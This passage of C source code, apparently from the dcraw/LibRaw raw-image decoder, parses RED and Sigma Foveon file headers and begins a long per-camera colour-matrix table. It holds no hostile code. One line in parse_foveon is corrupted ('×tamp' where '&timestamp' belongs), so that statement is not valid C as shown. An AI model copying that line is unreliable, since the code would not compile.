fseek (ifp, shot_select*8, SEEK_CUR);
data_offset = (INT64) get4() + 8;
data_offset += (INT64) get4() << 32;
}
void CLASS parse_redcine()
{
unsigned i, len, rdvo;
order = 0x4d4d;
is_raw = 0;
fseek (ifp, 52, SEEK_SET);
width = get4();
height = get4();
fseek (ifp, 0, SEEK_END);
fseek (ifp, -(i = ftello(ifp) & 511), SEEK_CUR);
if (get4() != i || get4() != 0x52454f42) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Tail is missing, parsing from head...\n"), ifname);
#endif
fseek (ifp, 0, SEEK_SET);
while ((len = get4()) != EOF) {
if (get4() == 0x52454456)
if (is_raw++ == shot_select)
data_offset = ftello(ifp) - 8;
fseek (ifp, len-8, SEEK_CUR);
}
} else {
rdvo = get4();
fseek (ifp, 12, SEEK_CUR);
is_raw = get4();
fseeko (ifp, rdvo+8 + shot_select*4, SEEK_SET);
data_offset = get4();
}
}
//@end COMMON
char * CLASS foveon_gets (int offset, char *str, int len)
{
int i;
fseek (ifp, offset, SEEK_SET);
for (i=0; i < len-1; i++)
if ((str[i] = get2()) == 0) break;
str[i] = 0;
return str;
}
void CLASS parse_foveon()
{
int entries, img=0, off, len, tag, save, i, wide, high, pent, poff[256][2];
char name[64], value[64];
order = 0x4949; /* Little-endian */
fseek (ifp, 36, SEEK_SET);
flip = get4();
fseek (ifp, -4, SEEK_END);
fseek (ifp, get4(), SEEK_SET);
if (get4() != 0x64434553) return; /* SECd */
entries = (get4(),get4());
while (entries--) {
off = get4();
len = get4();
tag = get4();
save = ftell(ifp);
fseek (ifp, off, SEEK_SET);
if (get4() != (0x20434553 | (tag << 24))) return;
switch (tag) {
case 0x47414d49: /* IMAG */
case 0x32414d49: /* IMA2 */
fseek (ifp, 8, SEEK_CUR);
pent = get4();
wide = get4();
high = get4();
if (wide > raw_width && high > raw_height) {
switch (pent) {
case 5: load_flags = 1;
case 6: load_raw = &CLASS foveon_sd_load_raw; break;
case 30: load_raw = &CLASS foveon_dp_load_raw; break;
default: load_raw = 0;
}
raw_width = wide;
raw_height = high;
data_offset = off+28;
is_foveon = 1;
}
fseek (ifp, off+28, SEEK_SET);
if (fgetc(ifp) == 0xff && fgetc(ifp) == 0xd8
&& thumb_length < len-28) {
thumb_offset = off+28;
thumb_length = len-28;
write_thumb = &CLASS jpeg_thumb;
}
if (++img == 2 && !thumb_length) {
thumb_offset = off+24;
thumb_width = wide;
thumb_height = high;
write_thumb = &CLASS foveon_thumb;
}
break;
case 0x464d4143: /* CAMF */
meta_offset = off+8;
meta_length = len-28;
break;
case 0x504f5250: /* PROP */
pent = (get4(),get4());
fseek (ifp, 12, SEEK_CUR);
off += pent*8 + 24;
if ((unsigned) pent > 256) pent=256;
for (i=0; i < pent*2; i++)
((int *)poff)[i] = off + get4()*2;
for (i=0; i < pent; i++) {
foveon_gets (poff[i][0], name, 64);
foveon_gets (poff[i][1], value, 64);
if (!strcmp (name, "ISO"))
iso_speed = atoi(value);
if (!strcmp (name, "CAMMANUF"))
strcpy (make, value);
if (!strcmp (name, "CAMMODEL"))
strcpy (model, value);
if (!strcmp (name, "WB_DESC"))
strcpy (model2, value);
if (!strcmp (name, "TIME"))
timestamp = atoi(value);
if (!strcmp (name, "EXPTIME"))
shutter = atoi(value) / 1000000.0;
if (!strcmp (name, "APERTURE"))
aperture = atof(value);
if (!strcmp (name, "FLENGTH"))
focal_len = atof(value);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp (name, "CAMSERIAL"))
strcpy (imgdata.shootinginfo.BodySerial, value);
if (!strcmp (name, "FLEQ35MM"))
imgdata.lens.makernotes.FocalLengthIn35mmFormat = atof(value);
if (!strcmp (name, "LENSARANGE"))
{
char *sp;
imgdata.lens.makernotes.MaxAp4CurFocal = imgdata.lens.makernotes.MinAp4CurFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MinAp4CurFocal = atof(sp);
if (imgdata.lens.makernotes.MaxAp4CurFocal > imgdata.lens.makernotes.MinAp4CurFocal)
my_swap (float, imgdata.lens.makernotes.MaxAp4CurFocal, imgdata.lens.makernotes.MinAp4CurFocal);
}
}
if (!strcmp (name, "LENSFRANGE"))
{
char *sp;
imgdata.lens.makernotes.MinFocal = imgdata.lens.makernotes.MaxFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MaxFocal = atof(sp);
if ((imgdata.lens.makernotes.MaxFocal + 0.17f) < imgdata.lens.makernotes.MinFocal)
my_swap (float, imgdata.lens.makernotes.MaxFocal, imgdata.lens.makernotes.MinFocal);
}
}
if (!strcmp (name, "LENSMODEL"))
{
char *sp;
imgdata.lens.makernotes.LensID = strtol (value, &sp, 16); // atoi(value);
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = Sigma_X3F;
}
}
#endif
}
#ifdef LOCALTIME
timestamp = mktime (gmtime (×tamp));
#endif
}
fseek (ifp, save, SEEK_SET);
}
}
//@out COMMON
/*
All matrices are from Adobe DNG Converter unless otherwise noted.
*/
void CLASS adobe_coeff (const char *t_make, const char *t_model
#ifdef LIBRAW_LIBRARY_BUILD
,int internal_only
#endif
)
{
static const struct {
const char *prefix;
int t_black, t_maximum, trans[12];
} table[] = {
{ "AgfaPhoto DC-833m", 0, 0, /* DJC */
{ 11438,-3762,-1115,-2409,9914,2497,-1227,2295,5300 } },
{ "Apple QuickTake", 0, 0, /* DJC */
{ 21392,-5653,-3353,2406,8010,-415,7166,1427,2078 } },
{"Broadcom RPi IMX219", 66, 0x3ff,
{ 5302,1083,-728,-5320,14112,1699,-863,2371,5136 } }, /* LibRaw */
{ "Broadcom RPi OV5647", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Canon EOS D2000", 0, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Canon EOS D6000", 0, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Canon EOS D30", 0, 0,
{ 9805,-2689,-1312,-5803,13064,3068,-2438,3075,8775 } },
{ "Canon EOS D60", 0, 0xfa0,
{ 6188,-1341,-890,-7168,14489,2937,-2640,3228,8483 } },
{ "Canon EOS 5DS", 0, 0x3c96,
{ 6250,-711,-808,-5153,12794,2636,-1249,2198,5610 } },
{ "Canon EOS 5D Mark IV", 0, 0,
{ 6446, -366, -864, -4436, 12204, 2513, -952, 2496, 6348 }},
{ "Canon EOS 5D Mark III", 0, 0x3c80,
{ 6722,-635,-963,-4287,12460,2028,-908,2162,5668 } },
{ "Canon EOS 5D Mark II", 0, 0x3cf0,
{ 4716,603,-830,-7798,15474,2480,-1496,1937,6651 } },
{ "Canon EOS 5D", 0, 0xe6c,
{ 6347,-479,-972,-8297,15954,2480,-1968,2131,7649 } },
{ "Canon EOS 6D", 0, 0x3c82,
{ 8621,-2197,-787,-3150,11358,912,-1161,2400,4836 } },
{ "Canon EOS 7D Mark II", 0, 0x3510,
{ 7268,-1082,-969,-4186,11839,2663,-825,2029,5839 } },
{ "Canon EOS 7D", 0, 0x3510,
{ 6844,-996,-856,-3876,11761,2396,-593,1772,6198 } },
{ "Canon EOS 80D", 0, 0,
{ 7457,-671,-937,-4849,12495,2643,-1213,2354,5492 } },
{ "Canon EOS 10D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 20Da", 0, 0,
{ 14155,-5065,-1382,-6550,14633,2039,-1623,1824,6561 } },
{ "Canon EOS 20D", 0, 0xfff,
{ 6599,-537,-891,-8071,15783,2424,-1983,2234,7462 } },
{ "Canon EOS 30D", 0, 0,
{ 6257,-303,-1000,-7880,15621,2396,-1714,1904,7046 } },
{ "Canon EOS 40D", 0, 0x3f60,
{ 6071,-747,-856,-7653,15365,2441,-2025,2553,7315 } },
{ "Canon EOS 50D", 0, 0x3d93,
{ 4920,616,-593,-6493,13964,2784,-1774,3178,7005 } },
{ "Canon EOS 60D", 0, 0x2ff7,
{ 6719,-994,-925,-4408,12426,2211,-887,2129,6051 } },
{ "Canon EOS 70D", 0, 0x3bc7,
{ 7034,-804,-1014,-4420,12564,2058,-851,1994,5758 } },
{ "Canon EOS 100D", 0, 0x350f,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 300D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 350D", 0, 0xfff,
{ 6018,-617,-965,-8645,15881,2975,-1530,1719,7642 } },
{ "Canon EOS 400D", 0, 0xe8e,
{ 7054,-1501,-990,-8156,15544,2812,-1278,1414,7796 } },
{ "Canon EOS 450D", 0, 0x390d,
{ 5784,-262,-821,-7539,15064,2672,-1982,2681,7427 } },
{ "Canon EOS 500D", 0, 0x3479,
{ 4763,712,-646,-6821,14399,2640,-1921,3276,6561 } },
{ "Canon EOS 550D", 0, 0x3dd7,
{ 6941,-1164,-857,-3825,11597,2534,-416,1540,6039 } },
{ "Canon EOS 600D", 0, 0x3510,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 650D", 0, 0x354d,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 750D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 760D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 700D", 0, 0x3c00,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 1000D", 0, 0xe43,
{ 6771,-1139,-977,-7818,15123,2928,-1244,1437,7533 } },
{ "Canon EOS 1100D", 0, 0x3510,
{ 6444,-904,-893,-4563,12308,2535,-903,2016,6728 } },
{ "Canon EOS 1200D", 0, 0x37c2,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 1300D", 0, 0x37c2,
{ 6939, -1016, -866, -4428, 12473, 2177, -1175, 2178, 6162 } },
{ "Canon EOS M3", 0, 0,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS M5", 0, 0, /* Adobe */
{ 8532, -701, -1167, -4095, 11879, 2508, -797, 2424, 7010 }},
{ "Canon EOS M10", 0, 0,
{ 6400,-480,-888,-5294,13416,2047,-1296,2203,6137 } },
{ "Canon EOS M", 0, 0,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS-1Ds Mark III", 0, 0x3bb0,
{ 5859,-211,-930,-8255,16017,2353,-1732,1887,7448 } },
{ "Canon EOS-1Ds Mark II", 0, 0xe80,
{ 6517,-602,-867,-8180,15926,2378,-1618,1771,7633 } },
{ "Canon EOS-1D Mark IV", 0, 0x3bb0,
{ 6014,-220,-795,-4109,12014,2361,-561,1824,5787 } },
{ "Canon EOS-1D Mark III", 0, 0x3bb0,
{ 6291,-540,-976,-8350,16145,2311,-1714,1858,7326 } },
{ "Canon EOS-1D Mark II N", 0, 0xe80,
{ 6240,-466,-822,-8180,15825,2500,-1801,1938,8042 } },
{ "Canon EOS-1D Mark II", 0, 0xe80,
{ 6264,-582,-724,-8312,15948,2504,-1744,1919,8664 } },
{ "Canon EOS-1DS", 0, 0xe20,
{ 4374,3631,-1743,-7520,15212,2472,-2892,3632,8161 } },
{ "Canon EOS-1D C", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D X Mark II", 0, 0x3c4e,
{ 7596,-978,967,-4808,12571,2503,-1398,2567,5752 } },
{ "Canon EOS-1D X", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D", 0, 0xe20,
{ 6806,-179,-1020,-8097,16415,1687,-3267,4236,7690 } },
{ "Canon EOS C500", 853, 0, /* DJC */
{ 17851,-10604,922,-7425,16662,763,-3660,3636,22278 } },
{ "Canon PowerShot A530", 0, 0,
{ 0 } }, /* don't want the A5 matrix */
{ "Canon PowerShot A50", 0, 0,
{ -5300,9846,1776,3436,684,3939,-5540,9879,6200,-1404,11175,217 } },
{ "Canon PowerShot A5", 0, 0,
{ -4801,9475,1952,2926,1611,4094,-5259,10164,5947,-1554,10883,547 } },
{ "Canon PowerShot G10", 0, 0,
{ 11093,-3906,-1028,-5047,12492,2879,-1003,1750,5561 } },
{ "Canon PowerShot G11", 0, 0,
{ 12177,-4817,-1069,-1612,9864,2049,-98,850,4471 } },
{ "Canon PowerShot G12", 0, 0,
{ 13244,-5501,-1248,-1508,9858,1935,-270,1083,4366 } },
{ "Canon PowerShot G15", 0, 0,
{ 7474,-2301,-567,-4056,11456,2975,-222,716,4181 } },
{ "Canon PowerShot G16", 0, 0,
{ 14130,-8071,127,2199,6528,1551,3402,-1721,4960 } },
{ "Canon PowerShot G1 X Mark II", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1 X", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1", 0, 0,
{ -4778,9467,2172,4743,-1141,4344,-5146,9908,6077,-1566,11051,557 } },
{ "Canon PowerShot G2", 0, 0,
{ 9087,-2693,-1049,-6715,14382,2537,-2291,2819,7790 } },
{ "Canon PowerShot G3 X", 0, 0,
{ 9701,-3857,-921,-3149,11537,1817,-786,1817,5147 } },
{ "Canon PowerShot G3", 0, 0,
{ 9212,-2781,-1073,-6573,14189,2605,-2300,2844,7664 } },
{ "Canon PowerShot G5 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G5", 0, 0,
{ 9757,-2872,-933,-5972,13861,2301,-1622,2328,7212 } },
{ "Canon PowerShot G6", 0, 0,
{ 9877,-3775,-871,-7613,14807,3072,-1448,1305,7485 } },
{ "Canon PowerShot G7 X Mark II", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G7 X", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9", 0, 0,
{ 7368,-2141,-598,-5621,13254,2625,-1418,1696,5743 } },
{ "Canon PowerShot Pro1", 0, 0,
{ 10062,-3522,-999,-7643,15117,2730,-765,817,7323 } },
{ "Canon PowerShot Pro70", 34, 0,
{ -4155,9818,1529,3939,-25,4522,-5521,9870,6610,-2238,10873,1342 } },
{ "Canon PowerShot Pro90", 0, 0,
{ -4963,9896,2235,4642,-987,4294,-5162,10011,5859,-1770,11230,577 } },
{ "Canon PowerShot S30", 0, 0,
{ 10566,-3652,-1129,-6552,14662,2006,-2197,2581,7670 } },
{ "Canon PowerShot S40", 0, 0,
{ 8510,-2487,-940,-6869,14231,2900,-2318,2829,9013 } },
{ "Canon PowerShot S45", 0, 0,
{ 8163,-2333,-955,-6682,14174,2751,-2077,2597,8041 } },
{ "Canon PowerShot S50", 0, 0,
{ 8882,-2571,-863,-6348,14234,2288,-1516,2172,6569 } },
{ "Canon PowerShot S60", 0, 0,
{ 8795,-2482,-797,-7804,15403,2573,-1422,1996,7082 } },
{ "Canon PowerShot S70", 0, 0,
{ 9976,-3810,-832,-7115,14463,2906,-901,989,7889 } },
{ "Canon PowerShot S90", 0, 0,
{ 12374,-5016,-1049,-1677,9902,2078,-83,852,4683 } },
{ "Canon PowerShot S95", 0, 0,
{ 13440,-5896,-1279,-1236,9598,1931,-180,1001,4651 } },
{ "Canon PowerShot S120", 0, 0,
{ 6961,-1685,-695,-4625,12945,1836,-1114,2152,5518 } },
{ "Canon PowerShot S110", 0, 0,
{ 8039,-2643,-654,-3783,11230,2930,-206,690,4194 } },
{ "Canon PowerShot S100", 0, 0,
{ 7968,-2565,-636,-2873,10697,2513,180,667,4211 } },
{ "Canon PowerShot SX1 IS", 0, 0,
{ 6578,-259,-502,-5974,13030,3309,-308,1058,4970 } },
{ "Canon PowerShot SX50 HS", 0, 0,
{ 12432,-4753,-1247,-2110,10691,1629,-412,1623,4926 } },
{ "Canon PowerShot SX60 HS", 0, 0,
{ 13161,-5451,-1344,-1989,10654,1531,-47,1271,4955 } },
{ "Canon PowerShot A3300", 0, 0, /* DJC */
{ 10826,-3654,-1023,-3215,11310,1906,0,999,4960 } },
{ "Canon PowerShot A470", 0, 0, /* DJC */
{ 12513,-4407,-1242,-2680,10276,2405,-878,2215,4734 } },
{ "Canon PowerShot A610", 0, 0, /* DJC */
{ 15591,-6402,-1592,-5365,13198,2168,-1300,1824,5075 } },
{ "Canon PowerShot A620", 0, 0, /* DJC */
{ 15265,-6193,-1558,-4125,12116,2010,-888,1639,5220 } },
{ "Canon PowerShot A630", 0, 0, /* DJC */
{ 14201,-5308,-1757,-6087,14472,1617,-2191,3105,5348 } },
{ "Canon PowerShot A640", 0, 0, /* DJC */
{ 13124,-5329,-1390,-3602,11658,1944,-1612,2863,4885 } },
{ "Canon PowerShot A650", 0, 0, /* DJC */
{ 9427,-3036,-959,-2581,10671,1911,-1039,1982,4430 } },
{ "Canon PowerShot A720", 0, 0, /* DJC */
{ 14573,-5482,-1546,-1266,9799,1468,-1040,1912,3810 } },
{ "Canon PowerShot S3 IS", 0, 0, /* DJC */
{ 14062,-5199,-1446,-4712,12470,2243,-1286,2028,4836 } },
{ "Canon PowerShot SX110 IS", 0, 0, /* DJC */
{ 14134,-5576,-1527,-1991,10719,1273,-1158,1929,3581 } },
{ "Canon PowerShot SX220", 0, 0, /* DJC */
{ 13898,-5076,-1447,-1405,10109,1297,-244,1860,3687 } },
{ "Canon IXUS 160", 0, 0, /* DJC */
{ 11657,-3781,-1136,-3544,11262,2283,-160,1219,4700 } },
{ "Casio EX-S20", 0, 0, /* DJC */
{ 11634,-3924,-1128,-4968,12954,2015,-1588,2648,7206 } },
{ "Casio EX-Z750", 0, 0, /* DJC */
{ 10819,-3873,-1099,-4903,13730,1175,-1755,3751,4632 } },
{ "Casio EX-Z10", 128, 0xfff, /* DJC */
{ 9790,-3338,-603,-2321,10222,2099,-344,1273,4799 } },
{ "CINE 650", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE 660", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE", 0, 0,
{ 20183,-4295,-423,-3940,15330,3985,-280,4870,9800 } },
{ "Contax N Digital", 0, 0xf1e,
{ 7777,1285,-1053,-9280,16543,2916,-3677,5679,7060 } },
{ "DXO ONE", 0, 0,
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Epson R-D1", 0, 0,
{ 6827,-1878,-732,-8429,16012,2564,-704,592,7145 } },
{ "Fujifilm E550", 0, 0,
{ 11044,-3888,-1120,-7248,15168,2208,-1531,2277,8069 } },
{ "Fujifilm E900", 0, 0,
{ 9183,-2526,-1078,-7461,15071,2574,-2022,2440,8639 } },
{ "Fujifilm F5", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F6", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F77", 0, 0xfe9,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F7", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm F8", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm S100FS", 514, 0,
{ 11521,-4355,-1065,-6524,13767,3058,-1466,1984,6045 } },
{ "Fujifilm S1", 0, 0,
{ 12297,-4882,-1202,-2106,10691,1623,-88,1312,4790 } },
{ "Fujifilm S20Pro", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm S20", 512, 0x3fff,
{ 11401,-4498,-1312,-5088,12751,2613,-838,1568,5941 } },
{ "Fujifilm S2Pro", 128, 0,
{ 12492,-4690,-1402,-7033,15423,1647,-1507,2111,7697 } },
{ "Fujifilm S3Pro", 0, 0,
{ 11807,-4612,-1294,-8927,16968,1988,-2120,2741,8006 } },
{ "Fujifilm S5Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm S5000", 0, 0,
{ 8754,-2732,-1019,-7204,15069,2276,-1702,2334,6982 } },
{ "Fujifilm S5100", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5500", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5200", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S5600", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S6", 0, 0,
{ 12628,-4887,-1401,-6861,14996,1962,-2198,2782,7091 } },
{ "Fujifilm S7000", 0, 0,
{ 10190,-3506,-1312,-7153,15051,2238,-2003,2399,7505 } },
{ "Fujifilm S9000", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9500", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9100", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm S9600", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm SL1000", 0, 0,
{ 11705,-4262,-1107,-2282,10791,1709,-555,1713,4945 } },
{ "Fujifilm IS-1", 0, 0,
{ 21461,-10807,-1441,-2332,10599,1999,289,875,7703 } },
{ "Fujifilm IS Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm HS10 HS11", 0, 0xf68,
{ 12440,-3954,-1183,-1123,9674,1708,-83,1614,4086 } },
{ "Fujifilm HS2", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS3", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS50EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm F900EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm X100S", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100T", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100", 0, 0,
{ 12161,-4457,-1069,-5034,12874,2400,-795,1724,6904 } },
{ "Fujifilm X10", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X20", 0, 0,
{ 11768,-4971,-1133,-4904,12927,2183,-480,1723,4605 } },
{ "Fujifilm X30", 0, 0,
{ 12328,-5256,-1144,-4469,12927,1675,-87,1291,4351 } },
{ "Fujifilm X70", 0, 0,
{ 10450,-4329,-878,-3217,11105,2421,-752,1758,6519 } },
{ "Fujifilm X-Pro1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-Pro2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm X-A1", 0, 0,
{ 11086,-4555,-839,-3512,11310,2517,-815,1341,5940 } },
{ "Fujifilm X-A2", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-E1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-E2S", 0, 0,
{ 11562,-5118,-961,-3022,11007,2311,-525,1569,6097 } },
{ "Fujifilm X-E2", 0, 0,
{ 12066,-5927,-367,-1969,9878,1503,-721,2034,5453 } },
{ "Fujifilm XF1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-M1", 0, 0,
{ 13193,-6685,-425,-2229,10458,1534,-878,1763,5217 } },
{ "Fujifilm X-S1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-T10", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-T1", 0, 0,
{ 8458,-2451,-855,-4597,12447,2407,-1475,2482,6526 } },
{ "Fujifilm X-T2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm XQ1", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "Fujifilm XQ2", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "GITUP GIT2", 3200, 0,
{8489, -2583,-1036,-8051,15583,2643,-1307,1407,7354}},
{ "Hasselblad Lunar", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Hasselblad Stellar", -800, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Hasselblad CFV", 0, 0, /* Adobe */
{ 8519, -3260, -280, -5081, 13459, 1738, -1449, 2960, 7809, } },
{ "Hasselblad H-16MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-22MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-31MP",0, 0, /* LibRaw */
{ 14480,-5448,-1686,-3534,13123,2260,384,2952,7232 } },
{ "Hasselblad H-39MP",0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H3D-50", 0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H4D-40",0, 0, /* LibRaw */
{ 6325,-860,-957,-6559,15945,266,167,770,5936 } },
{ "Hasselblad H4D-50",0, 0, /* LibRaw */
{ 15283,-6272,-465,-2030,16031,478,-2379,390,7965 } },
{ "Hasselblad H4D-60",0, 0, /* Adobe */
{ 9662, -684, -279, -4903, 12293, 2950, -344, 1669, 6024 } },
{ "Hasselblad H5D-50c",0, 0, /* Adobe */
{ 4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 } },
{ "Hasselblad H5D-50",0, 0, /* Adobe */
{ 5656, -659, -346, -3923, 12306, 1791, -1602, 3509, 5442 } },
{ "Hasselblad X1D",0, 0, /* Adobe */
{4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 }},
{ "HTC One A9", 64, 1023, /* this is CM1 transposed */
{ 101, -20, -2, -11, 145, 41, -24, 1, 56 } },
{ "Imacon Ixpress", 0, 0, /* DJC */
{ 7025,-1415,-704,-5188,13765,1424,-1248,2742,6038 } },
{ "Kodak NC2000", 0, 0,
{ 13891,-6055,-803,-465,9919,642,2121,82,1291 } },
{ "Kodak DCS315C", -8, 0,
{ 17523,-4827,-2510,756,8546,-137,6113,1649,2250 } },
{ "Kodak DCS330C", -8, 0,
{ 20620,-7572,-2801,-103,10073,-396,3551,-233,2220 } },
{ "Kodak DCS420", 0, 0,
{ 10868,-1852,-644,-1537,11083,484,2343,628,2216 } },
{ "Kodak DCS460", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS1", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS3B", 0, 0,
{ 9898,-2700,-940,-2478,12219,206,1985,634,1031 } },
{ "Kodak DCS520C", -178, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Kodak DCS560C", -177, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Kodak DCS620C", -177, 0,
{ 23617,-10175,-3149,-2054,11749,-272,2586,-489,3453 } },
{ "Kodak DCS620X", -176, 0,
{ 13095,-6231,154,12221,-21,-2137,895,4602,2258 } },
{ "Kodak DCS660C", -173, 0,
{ 18244,-6351,-2739,-791,11193,-521,3711,-129,2802 } },
{ "Kodak DCS720X", 0, 0,
{ 11775,-5884,950,9556,1846,-1286,-1019,6221,2728 } },
{ "Kodak DCS760C", 0, 0,
{ 16623,-6309,-1411,-4344,13923,323,2285,274,2926 } },
{ "Kodak DCS Pro SLR", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14nx", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14", 0, 0,
{ 7791,3128,-776,-8588,16458,2039,-2455,4006,6198 } },
{ "Kodak ProBack645", 0, 0,
{ 16414,-6060,-1470,-3555,13037,473,2545,122,4948 } },
{ "Kodak ProBack", 0, 0,
{ 21179,-8316,-2918,-915,11019,-165,3477,-180,4210 } },
{ "Kodak P712", 0, 0,
{ 9658,-3314,-823,-5163,12695,2768,-1342,1843,6044 } },
{ "Kodak P850", 0, 0xf7c,
{ 10511,-3836,-1102,-6946,14587,2558,-1481,1792,6246 } },
{ "Kodak P880", 0, 0xfff,
{ 12805,-4662,-1376,-7480,15267,2360,-1626,2194,7904 } },
{ "Kodak EasyShare Z980", 0, 0,
